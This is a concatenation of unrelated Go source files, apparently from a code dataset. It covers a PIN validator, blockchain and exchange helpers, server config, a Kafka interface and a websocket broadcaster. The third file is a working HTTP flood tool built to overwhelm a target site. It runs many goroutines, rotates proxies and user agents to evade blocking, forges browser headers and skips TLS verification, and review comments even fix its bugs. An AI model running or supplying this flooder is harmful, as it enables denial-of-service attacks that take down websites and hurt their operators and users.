Empty strings should return false when tested.
If you need help, look in the Resources tab.
*/
package main
// main exercises validate against a fixed table of PIN strings and
// panics (via assert) on the first mismatch.
func main() {
	cases := []struct {
		pin  string
		want bool
	}{
		{"1234", true},
		{"45135", false},
		{"89abc1", false},
		{"900876", true},
		{" 4983", false},
		{"123456", true},
		{"4512a5", false},
		{"", false},
		{"21904", false},
		{"9451", true},
		{"213132", true},
		{" 4520", false},
		{"15632", false},
		{"000000", true},
	}
	for _, c := range cases {
		assert(validate(c.pin) == c.want)
	}
}
// validate reports whether s is a well-formed PIN: exactly 4 or 6
// characters long and made up entirely of ASCII digits.
func validate(s string) bool {
	if n := len(s); n != 4 && n != 6 {
		return false
	}
	// Byte-wise scan is equivalent to the rune scan here: any byte of a
	// multi-byte rune is >= 0x80 and therefore outside '0'..'9'.
	for i := 0; i < len(s); i++ {
		if s[i] < '0' || s[i] > '9' {
			return false
		}
	}
	return true
}
// assert panics with a fixed message when its argument is false.
func assert(ok bool) {
	if ok {
		return
	}
	panic("assertion failed")
}
|
package main
import "fmt"
// main demonstrates round-tripping a string through a byte slice:
// string -> []byte -> string.
func main() {
	name := "Ramesh"
	asBytes := []byte(name)
	roundTripped := string(asBytes)
	fmt.Println("Name --------> ", name) // --> string of a name
	fmt.Println(name, "Byte array(Slice) ----> ", asBytes)
	fmt.Println(asBytes, "convertedSliceToString--------->", roundTripped)
}
|
package main
import (
"fmt"
"io/ioutil"
"strings"
"os"
"strconv"
"math/rand"
"net/http"
"net/url"
"log"
"time"
// "bytes"
"crypto/tls"
)
// main parses the command-line arguments, loads the proxy and user-agent
// lists, then starts _THREADS goroutines that each issue requests against
// the target for _TIME seconds before the process exits.
//
// Recognized flags (each consumes the following argument):
//   -h  target URL          -p  proxies file       -u  user-agents file
//   -m  HTTP method         -pd POST body          -c  cookie string
//   -t  duration (seconds)  -r  requests per loop  -n  goroutine count
func main() {
	rand.Seed(time.Now().UnixNano())
	args := os.Args
	var _URL, _PROXIES_FILE, _UAS_FILE, _METHOD, _POSTDATA, _COOKIE string
	var _TIME, _RATE, _THREADS int
	var _PROXIES, _USERAGENTS []string
	_POSTDATA = ""
	_COOKIE = ""
	// NOTE(review): each branch reads args[k+1] without a bounds check, so a
	// flag given as the last argument panics with index out of range.
	for k, v := range args {
		if v == "-h" {
			_URL = args[k+1]
		}
		if v == "-p" {
			_PROXIES_FILE = args[k+1]
			_PROXIES = loadProxysList(_PROXIES_FILE)
		}
		if v == "-pd" {
			_POSTDATA = args[k+1]
		}
		if v == "-c" {
			_COOKIE = args[k+1]
		}
		if v == "-u" {
			_UAS_FILE = args[k+1]
			_USERAGENTS = loadUserAgentsList(_UAS_FILE)
		}
		if v == "-m" {
			_METHOD = args[k+1]
		}
		if v == "-t" {
			// NOTE(review): this local "time" shadows the time package inside
			// this block; harmless here but worth renaming.
			time, err := strconv.Atoi(args[k+1])
			if err == nil {
				_TIME = time
			} else {
				fmt.Println("Time is number")
			}
		}
		if v == "-r" {
			rate, err := strconv.Atoi(args[k+1])
			if err == nil {
				_RATE = rate
			} else {
				fmt.Println("Rate is number")
			}
		}
		if v == "-n" {
			thread, err := strconv.Atoi(args[k+1])
			if err == nil {
				_THREADS = thread
			} else {
				fmt.Println("Threads is number")
			}
		}
	}
	//DEBUG
	// fmt.Println(_URL)
	// fmt.Println(_PROXIES_FILE)
	// fmt.Println(_UAS_FILE)
	// fmt.Println(_METHOD)
	// fmt.Println(_TIME)
	// fmt.Println(_RATE)
	fmt.Println("Number of proxies :", len(_PROXIES))
	fmt.Println("Number of useragents :", len(_USERAGENTS))
	for count := 0; count < _THREADS; count++ {
		go prepareRequest(_URL, _METHOD, _PROXIES, _USERAGENTS, _RATE, _TIME, _POSTDATA, _COOKIE)
	}
	// The workers are not joined; main simply sleeps for the run duration and
	// lets the process exit, killing any still-running goroutines.
	time.Sleep(time.Duration(_TIME) * time.Second)
}
// loadProxysList reads a newline-separated list of proxies from path.
// On read failure it logs the error and returns the split of an empty
// string (a single empty entry), matching the previous behavior.
func loadProxysList(path string) []string {
	data, err := ioutil.ReadFile(path)
	if err != nil {
		fmt.Println("File reading error", err)
	}
	s := strings.Split(string(data), "\n")
	// BUG FIX: strip carriage returns, as loadUserAgentsList already does.
	// Without this, files with CRLF line endings leave "\r" glued to every
	// proxy host, breaking the later URL parse.
	for i, line := range s {
		s[i] = strings.ReplaceAll(line, "\r", "")
	}
	return s
}
// loadUserAgentsList reads a newline-separated list of user-agent strings
// from path, stripping any carriage returns left over from CRLF endings.
// On read failure it logs the error and returns the split of an empty string.
func loadUserAgentsList(path string) []string {
	data, err := ioutil.ReadFile(path)
	if err != nil {
		fmt.Println("File reading error", err)
	}
	lines := strings.Split(string(data), "\n")
	for i := range lines {
		lines[i] = strings.ReplaceAll(lines[i], "\r", "")
	}
	return lines
}
// prepareRequest loops until _TIME seconds have elapsed, each iteration
// picking a random proxy and user agent and firing one makeRequest call.
// Both lists must be non-empty; rand.Intn panics on a zero argument.
func prepareRequest(_URL string, _METHOD string, _PROXIES []string, _USERAGENTS []string, _RATE int, _TIME int, _POSTDATA string, _COOKIE string) {
	stopTime := time.Now().Unix() + int64(_TIME)
	for {
		if time.Now().Unix() > stopTime {
			return
		}
		// BUG FIX: rand.Intn(len(x)) covers the full index range [0, len).
		// The previous "rand.Intn(len(x)-1)+1" never selected index 0 and
		// panicked (Intn(0)) whenever the list held a single entry.
		proxy := _PROXIES[rand.Intn(len(_PROXIES))]
		useragent := _USERAGENTS[rand.Intn(len(_USERAGENTS))]
		makeRequest(_URL, _METHOD, proxy, useragent, _RATE, _POSTDATA, _COOKIE)
	}
}
// makeRequest builds one HTTP request for host (GET body-less, POST with
// _POSTDATA form-encoded), routes it through the given proxy with the given
// user agent, and sends it _RATE times on a fresh 10s-timeout client.
// TLS certificate verification is skipped for https targets.
func makeRequest(host string, method string, proxy string, useragent string, _RATE int, _POSTDATA string, _COOKIE string) {
	proxyURL, err := url.Parse("http://" + proxy)
	if err != nil {
		log.Println(err)
		return // an unparsable proxy cannot be used; previously execution continued
	}
	targetURL, err := url.Parse(host)
	if err != nil {
		log.Println(err)
		return
	}
	req, err := http.NewRequest(method, targetURL.String(), nil)
	if err != nil {
		return
	}
	if method == "POST" {
		m, perr := url.ParseQuery(_POSTDATA)
		if perr != nil {
			return
		}
		data := url.Values{}
		for k, v := range m {
			data.Set(k, v[0])
		}
		if req, err = http.NewRequest(method, targetURL.String(), strings.NewReader(data.Encode())); err != nil {
			return
		}
	}
	// Set headers
	req.Header.Set("Referer", targetURL.String())
	req.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8")
	req.Header.Set("Accept-encoding", "gzip, deflate, br")
	req.Header.Set("Accept-language", "en-US,en;q=0.9,he-IL;q=0.8,he;q=0.7,tr;q=0.6")
	req.Header.Set("Cache-Control", "no-cache")
	req.Header.Set("Pragma", "no-cache")
	req.Header.Set("Upgrade-Insecure-Requests", "1")
	req.Header.Set("User-Agent", useragent)
	if method == "POST" {
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	}
	if _COOKIE != "" {
		m, cerr := url.ParseQuery(_COOKIE)
		if cerr != nil {
			return
		}
		for k, v := range m {
			cookie := http.Cookie{Name: k, Value: v[0]}
			req.AddCookie(&cookie)
		}
	}
	transport := &http.Transport{
		Proxy:           http.ProxyURL(proxyURL),
		MaxIdleConns:    20000,
		IdleConnTimeout: 60 * time.Second,
		MaxConnsPerHost: 5000,
	}
	if targetURL.Scheme == "https" {
		// Skip certificate verify for performance.
		transport.TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
	}
	client := &http.Client{Timeout: time.Second * 10, Transport: transport}
	for count := 0; count < _RATE; count++ {
		resp, err := client.Do(req)
		if err != nil {
			return
		}
		// BUG FIX: the previous "defer resp.Body.Close()" inside the loop
		// accumulated up to _RATE open bodies until the function returned.
		// Drain and close each body immediately so the transport can reuse
		// the connection.
		ioutil.ReadAll(resp.Body)
		resp.Body.Close()
	}
}
|
package pdexv3
import (
"encoding/json"
"incognito-chain/common"
metadataCommon "incognito-chain/metadata/common"
"incognito-chain/privacy"
)
// AddOrderRequest is the metadata payload for placing a limit order on a
// pdexv3 pool pair.
type AddOrderRequest struct {
	// TokenToSell identifies the token being offered by this order.
	TokenToSell common.Hash `json:"TokenToSell"`
	// PoolPairID names the pool pair the order is placed on.
	PoolPairID string `json:"PoolPairID"`
	// SellAmount is the amount of TokenToSell offered.
	SellAmount uint64 `json:"SellAmount"`
	// MinAcceptableAmount is the minimum amount accepted in exchange —
	// presumably denominated in the pair's other token; confirm against the
	// order-matching logic.
	MinAcceptableAmount uint64 `json:"MinAcceptableAmount"`
	// Receiver maps a token id to the OTA receiver for that token's output.
	Receiver map[common.Hash]privacy.OTAReceiver `json:"Receiver"`
	// RewardReceiver optionally maps a token id to the OTA receiver for rewards.
	RewardReceiver map[common.Hash]privacy.OTAReceiver `json:"RewardReceiver,omitempty"`
	AccessOption
	metadataCommon.MetadataBase
}
// Hash returns the hash (via the project's common.HashH helper) of the
// request's JSON encoding. The marshal error is deliberately ignored:
// encoding this plain struct cannot fail.
func (req AddOrderRequest) Hash() *common.Hash {
	rawBytes, _ := json.Marshal(req)
	// rawBytes is already []byte; the previous []byte(rawBytes) conversion
	// was a redundant no-op copy.
	hash := common.HashH(rawBytes)
	return &hash
}
// UnmarshalJSON decodes an AddOrderRequest, accepting the numeric amount
// fields through metadataCommon.Uint64Reader (which tolerates both JSON
// numbers and strings).
func (req *AddOrderRequest) UnmarshalJSON(raw []byte) error {
	var temp struct {
		TokenToSell         common.Hash                         `json:"TokenToSell"`
		PoolPairID          string                              `json:"PoolPairID"`
		SellAmount          metadataCommon.Uint64Reader         `json:"SellAmount"`
		MinAcceptableAmount metadataCommon.Uint64Reader         `json:"MinAcceptableAmount"`
		Receiver            map[common.Hash]privacy.OTAReceiver `json:"Receiver"`
		RewardReceiver      map[common.Hash]privacy.OTAReceiver `json:"RewardReceiver,omitempty"`
		AccessOption
		metadataCommon.MetadataBase
	}
	// BUG FIX: bail out before touching the receiver. The previous version
	// overwrote *req with partially-decoded data even when Unmarshal failed.
	if err := json.Unmarshal(raw, &temp); err != nil {
		return err
	}
	*req = AddOrderRequest{
		TokenToSell:         temp.TokenToSell,
		PoolPairID:          temp.PoolPairID,
		SellAmount:          uint64(temp.SellAmount),
		MinAcceptableAmount: uint64(temp.MinAcceptableAmount),
		Receiver:            temp.Receiver,
		RewardReceiver:      temp.RewardReceiver,
		AccessOption:        temp.AccessOption,
		MetadataBase:        temp.MetadataBase,
	}
	return nil
}
|
package binance
import (
"context"
bin "github.com/adshao/go-binance"
"github.com/mhereman/cryptotrader/logger"
"github.com/mhereman/cryptotrader/types"
)
// GetSeries executes the klines request for the given symbol/timeframe and
// converts the exchange response into a types.Series.
func (b Binance) GetSeries(ctx context.Context, symbol types.Symbol, timeframe types.Timeframe) (series types.Series, err error) {
	binanceSymbol, err := b.symbolToBinance(symbol)
	if err != nil {
		logger.Errorf("Binance::GetSeries Error: %v\n", err)
		return
	}
	binanceInterval, err := b.timeframeToBinance(timeframe)
	if err != nil {
		logger.Errorf("Binance:GetSeries Error: %v\n", err)
		return
	}
	ks := b.client.NewKlinesService()
	ks.Symbol(binanceSymbol)
	ks.Interval(binanceInterval)
	response, err := ks.Do(ctx)
	if err != nil {
		logger.Errorf("Binance::GetSeries Error: %v\n", err)
		return
	}
	// Convert every returned kline into an OHLC entry, preserving order.
	ohlc := make([]types.OHLC, len(response))
	for i, k := range response {
		ohlc[i] = types.NewOHLC(
			b.toFloat(k.Open),
			b.toFloat(k.High),
			b.toFloat(k.Low),
			b.toFloat(k.Close),
			b.toFloat(k.Volume),
			b.toTime(k.OpenTime),
			b.toTime(k.CloseTime),
		)
	}
	series = types.NewSeries(symbol, timeframe, ohlc)
	return
}
|
package transformer
import (
"github.com/confluentinc/confluent-kafka-go/kafka"
)
// Transformer is an interface which is used by Kafka.Transformer
// in order to transform a kafka Message.
// Transform maps one consumed message to zero or more output messages.
// If nil is returned the message will be ignored.
type Transformer interface {
	Transform(src *kafka.Message) []*kafka.Message
}
|
package graphkb
import "github.com/clems4ever/go-graphkb/internal/utils"
// RecurrentTask aliases the internal recurrent-task type so that external
// packages can use it without importing internal/utils directly.
type RecurrentTask = utils.RecurrentTask

// NewRecurrentTask re-exports the internal RecurrentTask constructor.
var NewRecurrentTask = utils.NewRecurrentTask
|
package serverconfigs
import "strings"
// ServerGroup bundles the server configs that share one listening address.
type ServerGroup struct {
	// fullAddr is the complete address including its protocol prefix.
	fullAddr string
	// Servers holds the configs attached to this address.
	Servers []*ServerConfig
}
// NewServerGroup creates a group bound to the given full address
// (protocol prefix included).
func NewServerGroup(fullAddr string) *ServerGroup {
	group := new(ServerGroup)
	group.fullAddr = fullAddr
	return group
}
// Add appends a server config to this group.
func (g *ServerGroup) Add(server *ServerConfig) {
	g.Servers = append(g.Servers, server)
}
// FullAddr returns the raw address the group was created with,
// protocol prefix included.
func (g *ServerGroup) FullAddr() string {
	return g.fullAddr
}
// Protocol returns the protocol encoded in the address prefix, falling
// back to HTTP when no known protocol prefix matches.
func (g *ServerGroup) Protocol() Protocol {
	for _, protocol := range AllProtocols() {
		prefix := protocol.String() + ":"
		if strings.HasPrefix(g.fullAddr, prefix) {
			return protocol
		}
	}
	return ProtocolHTTP
}
// Addr returns the address with its protocol prefix stripped. Unix
// addresses use a bare "proto:" prefix; all others use "proto://".
func (g *ServerGroup) Addr() string {
	protocol := g.Protocol()
	sep := "://"
	if protocol == ProtocolUnix {
		sep = ":"
	}
	return strings.TrimPrefix(g.fullAddr, protocol.String()+sep)
}
// IsHTTP reports whether this group speaks any HTTP variant.
func (g *ServerGroup) IsHTTP() bool {
	switch g.Protocol() {
	case ProtocolHTTP, ProtocolHTTP4, ProtocolHTTP6:
		return true
	}
	return false
}

// IsHTTPS reports whether this group speaks any HTTPS variant.
func (g *ServerGroup) IsHTTPS() bool {
	switch g.Protocol() {
	case ProtocolHTTPS, ProtocolHTTPS4, ProtocolHTTPS6:
		return true
	}
	return false
}

// IsTCP reports whether this group speaks any TCP variant.
func (g *ServerGroup) IsTCP() bool {
	switch g.Protocol() {
	case ProtocolTCP, ProtocolTCP4, ProtocolTCP6:
		return true
	}
	return false
}

// IsTLS reports whether this group speaks any TLS variant.
func (g *ServerGroup) IsTLS() bool {
	switch g.Protocol() {
	case ProtocolTLS, ProtocolTLS4, ProtocolTLS6:
		return true
	}
	return false
}

// IsUnix reports whether this group uses a unix socket.
func (g *ServerGroup) IsUnix() bool {
	return g.Protocol() == ProtocolUnix
}

// IsUDP reports whether this group uses UDP.
func (g *ServerGroup) IsUDP() bool {
	return g.Protocol() == ProtocolUDP
}
// FirstServer returns the first server in the group, or nil when the
// group is empty.
func (g *ServerGroup) FirstServer() *ServerConfig {
	if len(g.Servers) == 0 {
		return nil
	}
	return g.Servers[0]
}
|
package keeper
import (
abci "github.com/tendermint/tendermint/abci/types"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
sdkerrors "github.com/cosmos/cosmos-sdk/types/errors"
"github.com/irisnet/irismod/modules/coinswap/types"
)
// NewQuerier creates a querier for coinswap REST endpoints. Only the
// liquidity query path is supported; anything else yields ErrUnknownRequest.
func NewQuerier(k Keeper, legacyQuerierCdc *codec.LegacyAmino) sdk.Querier {
	return func(ctx sdk.Context, path []string, req abci.RequestQuery) ([]byte, error) {
		if path[0] == types.QueryLiquidity {
			return queryLiquidity(ctx, req, k, legacyQuerierCdc)
		}
		return nil, sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, "unknown query path: %s", path[0])
	}
}
// queryLiquidity returns the total liquidity available for the provided denomination
// upon success or an error if the query fails.
func queryLiquidity(ctx sdk.Context, req abci.RequestQuery, k Keeper, legacyQuerierCdc *codec.LegacyAmino) ([]byte, error) {
var params types.QueryLiquidityParams
standardDenom := k.GetParams(ctx).StandardDenom
if err := legacyQuerierCdc.UnmarshalJSON(req.Data, ¶ms); err != nil {
return nil, sdkerrors.Wrap(sdkerrors.ErrJSONUnmarshal, err.Error())
}
if err := types.CheckUniDenom(params.ID); err != nil {
return nil, err
}
uniDenom := params.ID
tokenDenom, err := types.GetCoinDenomFromUniDenom(uniDenom)
if err != nil {
return nil, err
}
reservePool := k.GetReservePool(ctx, params.ID)
standard := sdk.NewCoin(standardDenom, reservePool.AmountOf(standardDenom))
token := sdk.NewCoin(tokenDenom, reservePool.AmountOf(tokenDenom))
liquidity := sdk.NewCoin(uniDenom, k.bk.GetSupply(ctx).GetTotal().AmountOf(uniDenom))
swapParams := k.GetParams(ctx)
fee := swapParams.Fee.String()
res := types.QueryLiquidityResponse{
Standard: standard,
Token: token,
Liquidity: liquidity,
Fee: fee,
}
bz, errRes := codec.MarshalJSONIndent(legacyQuerierCdc, res)
if errRes != nil {
return nil, sdkerrors.Wrap(sdkerrors.ErrJSONMarshal, err.Error())
}
return bz, nil
}
|
package security
import (
"html/template"
"net/http"
"strings"
"time"
)
// GenericPage returns a handler that serves a template needing no
// per-request data beyond the page title and the current date.
func GenericPage(t *template.Template, name string, title string) func(w http.ResponseWriter, r *http.Request) {
	return func(w http.ResponseWriter, r *http.Request) {
		// Short shared-cache lifetime for these static pages.
		w.Header().Set("Cache-Control", "max-age=6,s-maxage=6,no-transform,public")
		// Templates named "*_xml" are served as XML with a prolog prepended.
		if strings.HasSuffix(name, "_xml") {
			w.Header().Set("Content-type", "text/xml; charset=utf-8")
			w.Write([]byte("<?xml version=\"1.0\"?>"))
		}
		type Page struct {
			Title []string
			Slug  string
			Year  int
		}
		headerTitle := []string{}
		if len(title) > 0 {
			headerTitle = []string{title}
		}
		Render(r, w, t, name, &Page{
			Title: headerTitle,
			Slug:  time.Now().Format("2006/01/02/"),
			Year:  time.Now().Year(),
		})
	}
}
|
package web
import (
"context"
"crypto/md5"
"fmt"
"github.com/gorilla/websocket"
"io"
"log"
"math/rand"
"net/http"
"strconv"
"sync"
"time"
)
// upgrader performs HTTP -> websocket upgrades with the library's default options.
var upgrader = websocket.Upgrader{}
// WsHandler returns an HTTP handler that upgrades the connection to a
// websocket, registers it in cm under a fresh session id, fans every
// message from msgch out to all registered connections, and forwards text
// messages read from this client back into msgch.
func WsHandler(msgch *chan string, cm *Cmap) func(w http.ResponseWriter, r *http.Request) {
	return func(w http.ResponseWriter, r *http.Request) {
		id := createSessionId()
		c, err := upgrader.Upgrade(w, r, http.Header{
			"g_sessionid": []string{id},
		})
		if err != nil {
			// BUG FIX: previously the (possibly nil) connection was stored
			// and used even when the upgrade failed, which would panic on
			// the deferred Close. Bail out instead.
			log.Print("upgrade:", err)
			return
		}
		cm.set(id, c)
		defer func() {
			e := c.Close()
			failOnError(e, "")
		}()
		c.SetCloseHandler(func(code int, text string) error {
			// BUG FIX: remove the entry under the map's write lock; the
			// original deleted without synchronization (a data race).
			cm.L.Lock()
			delete(cm.M, id)
			cm.L.Unlock()
			fmt.Println(code, text)
			return nil
		})
		ctx, cancel := context.WithCancel(context.Background())
		go func() {
			for {
				select {
				case m := <-*msgch:
					// BUG FIX: hold the read lock while iterating; other
					// goroutines mutate cm.M concurrently.
					cm.L.RLock()
					for _, v := range cm.M {
						werr := v.WriteMessage(websocket.TextMessage, []byte(m))
						failOnError(werr, "websocket failed")
					}
					cm.L.RUnlock()
				case <-ctx.Done():
					return
				}
			}
		}()
		for {
			msgType, p, err := c.ReadMessage()
			if err != nil {
				fmt.Println("read message from client -> ", err)
				cancel() // stop the broadcast goroutine for this handler
				return
			}
			if msgType == websocket.TextMessage {
				*msgch <- string(p)
			}
		}
	}
}
// createSessionId derives a pseudo-random session id by hashing the current
// nanosecond timestamp together with a random 63-bit integer.
func createSessionId() string {
	// BUG FIX: the previous version re-seeded the global generator from the
	// clock on every call (rand.Seed is also deprecated); concurrent calls
	// landing in the same nanosecond would then draw identical random
	// values. The global source needs no per-call seeding.
	nano := time.Now().UnixNano()
	return md5hash(md5hash(strconv.FormatInt(nano, 10)) + md5hash(strconv.FormatInt(rand.Int63(), 10)))
}
// md5hash returns the lowercase hex MD5 digest of text.
func md5hash(text string) string {
	// md5.Sum cannot fail, unlike the previous io.WriteString-based version,
	// so no error plumbing (failOnError) is required.
	return fmt.Sprintf("%x", md5.Sum([]byte(text)))
}
// Cmap is a read-write-mutex-guarded map of session id -> websocket connection.
type Cmap struct {
	// M maps session ids to their connections; all access must hold L.
	M map[string]*websocket.Conn
	// L guards M.
	L sync.RWMutex
}
// set registers conn under id while holding the write lock.
func (cm *Cmap) set(id string, conn *websocket.Conn) {
	cm.L.Lock()
	defer cm.L.Unlock()
	cm.M[id] = conn
}
// get returns the connection registered under id (nil if absent),
// holding the read lock for the lookup.
func (cm *Cmap) get(id string) *websocket.Conn {
	cm.L.RLock()
	defer cm.L.RUnlock()
	return cm.M[id]
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.